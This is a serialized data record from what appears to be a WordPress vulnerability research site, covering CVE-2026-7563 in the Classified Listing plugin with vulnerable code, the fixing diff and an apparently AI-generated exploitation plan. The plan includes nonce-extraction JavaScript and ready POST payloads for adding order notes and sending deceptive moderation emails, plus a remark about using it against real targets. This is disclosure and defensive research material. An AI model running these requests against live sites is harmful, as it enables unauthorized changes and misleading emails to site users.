[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fu_pXU3ynFPObHOerEyTCuSKEyApdTFlgBZEvUp2u4dE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-7563","classified-listing-missing-authorization-to-authenticated-subscriber-arbitrary-modification-via-addordernote-and-sendema","Classified Listing \u003C= 5.3.10 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Modification via add_order_note and send_email_to_user_by_moderator AJAX Actions","The Classified Listing – AI-Powered Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 5.3.10. This is due to the plugin not properly verifying that a user is authorized to perform an action. 
This makes it possible for authenticated attackers, with subscriber-level access and above, to add arbitrary notes to any order and trigger unsolicited notification and moderation emails to listing owners without administrative authorization.","classified-listing",null,"\u003C=5.3.10","5.4.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-14 19:53:53","2026-05-15 08:27:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F07cb3d57-d768-49a5-8af0-9dc4384487d5?source=api-prod",1,[22,23,24,25,26,27,28,29],"README.txt","app\u002FControllers\u002FAdmin\u002FScriptLoader.php","app\u002FControllers\u002FAjax\u002FListingAdminAjax.php","app\u002FControllers\u002FHooks\u002FComments.php","app\u002FHelpers\u002FFunctions.php","assets\u002Fblock\u002Fmain.asset.php","assets\u002Fblock\u002Fmain.js","assets\u002Fcss\u002Frtcl-admin-settings.min.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-7563 (Classified Listing)\n\n## 1. Vulnerability Summary\n**Vulnerability Type:** Missing Authorization\n**Target Plugin:** Classified Listing – AI-Powered Classified ads & Business Directory Plugin\n**Affected Versions:** \u003C= 5.3.10\n**Vulnerable Actions:** `rtcl_add_order_note` and `rtcl_send_email_to_user_by_moderator`\n**Severity:** Medium (CVSS 4.3)\n\nThe vulnerability exists because two AJAX handlers—`add_order_note` and `send_email_to_user_by_moderator`—fail to implement any capability checks (`current_user_can`). While they verify a WordPress nonce, that nonce is a CSRF token, not an authorization control: it is tied to the requesting user's own session (standard WordPress nonce behaviour) and checked against a single shared action string (`rtcl()->nonceText`), and it is exposed in the localized `rtcl` JavaScript object on front-end pages that any logged-in user (Subscriber level and above) can load. This allows a Subscriber to add arbitrary notes to any Order ID (IDOR) and trigger moderation emails for any Listing ID.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** POST\n- **Authentication:** Required (Subscriber level or higher)\n- **Actions:** \n    - `action=rtcl_add_order_note` (adds notes to orders)\n    - `action=rtcl_send_email_to_user_by_moderator` (triggers emails for listings)\n- **Preconditions:**\n    - The attacker must be authenticated as a Subscriber.\n    - For `rtcl_add_order_note`, the attacker needs a target `post_id` corresponding to an order.\n    - For `rtcl_send_email_to_user_by_moderator`, the attacker needs a target `post_id` corresponding to a listing.\n\n## 3. Code Flow\n\n### Case A: Arbitrary Order Note\n1. **Entry Point:** `app\u002FControllers\u002FHooks\u002FComments.php` registers `wp_ajax_rtcl_add_order_note` to `add_order_note()`.\n2. **Nonce Check:** `wp_verify_nonce` is called using `rtcl()->nonceId` and `rtcl()->nonceText`.\n3. **Missing Auth:** The function immediately proceeds to extract `post_id`, `note`, and `note_type` from `$_POST`. No check is made to ensure the user is an admin or the owner of the order.\n4. **Sink:** `$order->add_note($note, $is_customer_note, true)` is called, which creates a new comment of type `rtcl_order_note` attached to the `post_id`.\n\n### Case B: Unsolicited Moderation Emails\n1. **Entry Point:** `app\u002FControllers\u002FAjax\u002FListingAdminAjax.php` registers `wp_ajax_rtcl_send_email_to_user_by_moderator` to `send_email_to_user_by_moderator()`.\n2. **Nonce Check:** `wp_verify_nonce` is called.\n3. **Missing Auth:** The function proceeds to extract `post_id` and `message`.\n4. **Sink:** `rtcl()->mailer()->emails['Listing_Moderation_Email_To_Owner']->trigger($post_id, $data)` is called, sending an email to the listing owner containing the arbitrary `message`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes the nonce into a JavaScript object named `rtcl`.\n\n1. 
**Shortcode Identification:** The plugin typically enqueues its core scripts on listing pages or the user dashboard. However, `ScriptLoader.php` shows that `rtcl-verify-js` is registered on the login page via `login_enqueue_scripts`, and `rtcl-common` is enqueued on the frontend.\n2. **Strategy:**\n    - Log in as a Subscriber.\n    - Create a simple page with the listing dashboard shortcode: `[rtcl_my_account]` (this is a test-harness step done as the site administrator — a Subscriber cannot create pages; against a real target, use any existing front-end page on which the `rtcl` object is localized).\n    - Navigate to that page.\n    - Use `browser_eval` to extract the nonce ID and value.\n3. **JS Variable Identification:**\n    - Inspect the `rtcl` object: `window.rtcl`.\n    - The nonce key is stored in the property matching the value of `rtcl()->nonceId`. \n    - Based on the source code in `ScriptLoader.php`, the localized object is `rtcl`.\n\n**Actionable JS Extraction:**\n```javascript\n\u002F\u002F To find the nonce key and value\n\u002F\u002F Note: this heuristic assumes the property name (the value of rtcl()->nonceId) contains the substring 'nonce';\n\u002F\u002F if it returns undefined, read the exact nonceId from the plugin source instead of guessing.\nconst nonceKey = Object.keys(window.rtcl).find(k => k.includes('nonce'));\nconst nonceValue = window.rtcl[nonceKey];\nreturn { nonceKey, nonceValue };\n```\n\n## 5. Exploitation Strategy\n\n### Step 1: Add Arbitrary Order Note\n**Request:**\n- **URL:** `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=rtcl_add_order_note&post_id=123&note=UnAuthorized_Note_Added&note_type=customer&[NONCE_KEY]=[NONCE_VALUE]\n  ```\n*(Replace `123` with a valid Order ID; Replace `[NONCE_KEY]` with the key found in step 4).*\n\n### Step 2: Trigger Moderation Email\n**Request:**\n- **URL:** `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=rtcl_send_email_to_user_by_moderator&post_id=456&message=Your+account+is+under+review+for+malpractice.&[NONCE_KEY]=[NONCE_VALUE]\n  ```\n*(Replace `456` with a valid Listing ID).*\n\n## 6. Test Data Setup\n1. 
**Target Admin User:** Ensure an admin user exists.\n2. **Target Content:**\n    - Create a Listing (Post Type: `rtcl_listing`) as the Admin. Note its ID.\n    - Create an Order (Post Type: `rtcl_order`) as the Admin. Note its ID.\n3. **Attacker User:**\n    - Create a user with the `subscriber` role.\n4. **Nonce Page:**\n    - Create a page at `\u002Fnonce-grabber` containing the shortcode `[rtcl_my_account]`.\n\n## 7. Expected Results\n- **Order Note:** The AJAX response should contain JSON with an `html` key containing the rendered list item for the new note.\n- **Moderation Email:** The AJAX response should contain `{\"error\":false,\"message\":\"Successfully sent\",\"class\":\"rtcl-flash-success\"}`.\n\n## 8. Verification Steps\n### Verify Order Note via WP-CLI:\n```bash\n# Check for comments of type 'rtcl_order_note' on the target post (the sink in Case A creates this comment type)\nwp comment list --post_id=123 --type=rtcl_order_note\n```\n\n### Verify Moderation Email Trigger via Database:\n```bash\n# Check if the notification count incremented in post meta\nwp post meta get 456 _notification_by_moderator\n```\n\n## 9. Alternative Approaches\nIf `rtcl_add_order_note` fails due to strict Order object instantiation, use `rtcl_delete_order_note` to test for authorization. Note that `delete_order_note` in `Comments.php` (line 126) **does** have a capability check: `current_user_can('manage_rtcl_options')`. The contrast between the two functions in the same file confirms that `add_order_note` is the primary vulnerability.","The Classified Listing plugin for WordPress is vulnerable to unauthorized data modification and email triggering due to missing capability checks in the `rtcl_add_order_note` and `rtcl_send_email_to_user_by_moderator` AJAX actions. 
This allows authenticated users with subscriber-level permissions or higher to add arbitrary notes to any order and send unsolicited moderation emails to listing owners.","\u002F\u002F app\u002FControllers\u002FHooks\u002FComments.php (Line 41-55)\n\tstatic function add_order_note() {\n\t\tif ( ! wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? $_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) || ! isset( $_POST['post_id'], $_POST['note'], $_POST['note_type'] ) ) {\n\t\t\twp_die( -1 );\n\t\t}\n\n\t\t$post_id   = absint( $_POST['post_id'] );\n\t\t$note      = wp_kses_post( trim( wp_unslash( $_POST['note'] ) ) );\n\t\t$note_type = Functions::clean( wp_unslash( $_POST['note_type'] ) );\n\n\t\t$is_customer_note = ( 'customer' === $note_type ) ? 1 : 0;\n\t\t$html             = '';\n\t\tif ( $post_id > 0 ) {\n\t\t\t$order      = rtcl()->factory->get_order( $post_id );\n\t\t\t$comment_id = $order->add_note( $note, $is_customer_note, true );\n\n---\n\n\u002F\u002F app\u002FControllers\u002FAjax\u002FListingAdminAjax.php (Line 36-46)\n\tfunction send_email_to_user_by_moderator() {\n\t\t$error = true;\n\t\t$class = 'rtcl-flash-warn';\n\t\tif ( wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? $_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) ) {\n\t\t\t$post_id = ! empty( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;\n\t\t\t$message = ! empty( $_POST['message'] ) ? 
esc_textarea( $_POST['message'] ) : '';\n\t\t\t$post    = get_post( $post_id );\n\t\t\tif ( $post && $message ) {\n\t\t\t\t$data['message'] = $message;\n\t\t\t\t$is_send         = rtcl()->mailer()->emails['Listing_Moderation_Email_To_Owner']->trigger( $post_id, $data );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php\t2026-04-29 05:15:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php\t2026-05-10 10:42:16.000000000 +0000\n@@ -36,6 +36,16 @@\n \t}\n \n \tfunction send_email_to_user_by_moderator() {\n+\t\tif ( ! current_user_can( 'manage_rtcl_options' ) ) {\n+\t\t\twp_send_json(\n+\t\t\t\t[\n+\t\t\t\t\t'error'   => true,\n+\t\t\t\t\t'message' => esc_html__( 'Unauthorized access!!!', 'classified-listing' ),\n+\t\t\t\t\t'class'   => 'rtcl-flash-warn',\n+\t\t\t\t],\n+\t\t\t);\n+\t\t}\n+\n \t\t$error = true;\n \t\t$class = 'rtcl-flash-warn';\n \t\tif ( wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? 
$_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) ) {\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FHooks\u002FComments.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FHooks\u002FComments.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FHooks\u002FComments.php\t2026-04-29 05:15:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FHooks\u002FComments.php\t2026-05-10 10:42:16.000000000 +0000\n@@ -49,7 +49,11 @@\n \t *\u002F\n \tstatic function add_order_note() {\n \t\tif ( ! wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? $_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) || ! isset( $_POST['post_id'], $_POST['note'], $_POST['note_type'] ) ) {\n-\t\t\twp_die( -1 );\n+\t\t\twp_die( - 1 );\n+\t\t}\n+\n+\t\tif ( ! current_user_can( 'manage_rtcl_options' ) ) {\n+\t\t\twp_die( - 1 );\n \t\t}","The exploit targets the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint. An attacker first authenticates as a Subscriber and retrieves a valid nonce from the global `rtcl` JavaScript object, which is localized on most frontend listing pages or the user dashboard. To add an arbitrary note to an order, the attacker sends a POST request with the action `rtcl_add_order_note`, the target `post_id` of an order, and the `note` content. To trigger a moderation email, the attacker sends a POST request with the action `rtcl_send_email_to_user_by_moderator`, the `post_id` of a listing, and a custom `message`. 
Both actions only verify the nonce and do not check whether the user holds the 'manage_rtcl_options' capability; that capability check is exactly what the 5.4.0 patch adds in front of both handlers, so a nonce alone must not be treated as evidence of authorization.","gemini-3-flash-preview","2026-05-20 17:37:32","2026-05-20 17:38:15",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.3.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclassified-listing\u002Ftags\u002F5.3.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclassified-listing.5.3.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclassified-listing\u002Ftags\u002F5.4.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclassified-listing.5.4.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclassified-listing\u002Ftags"]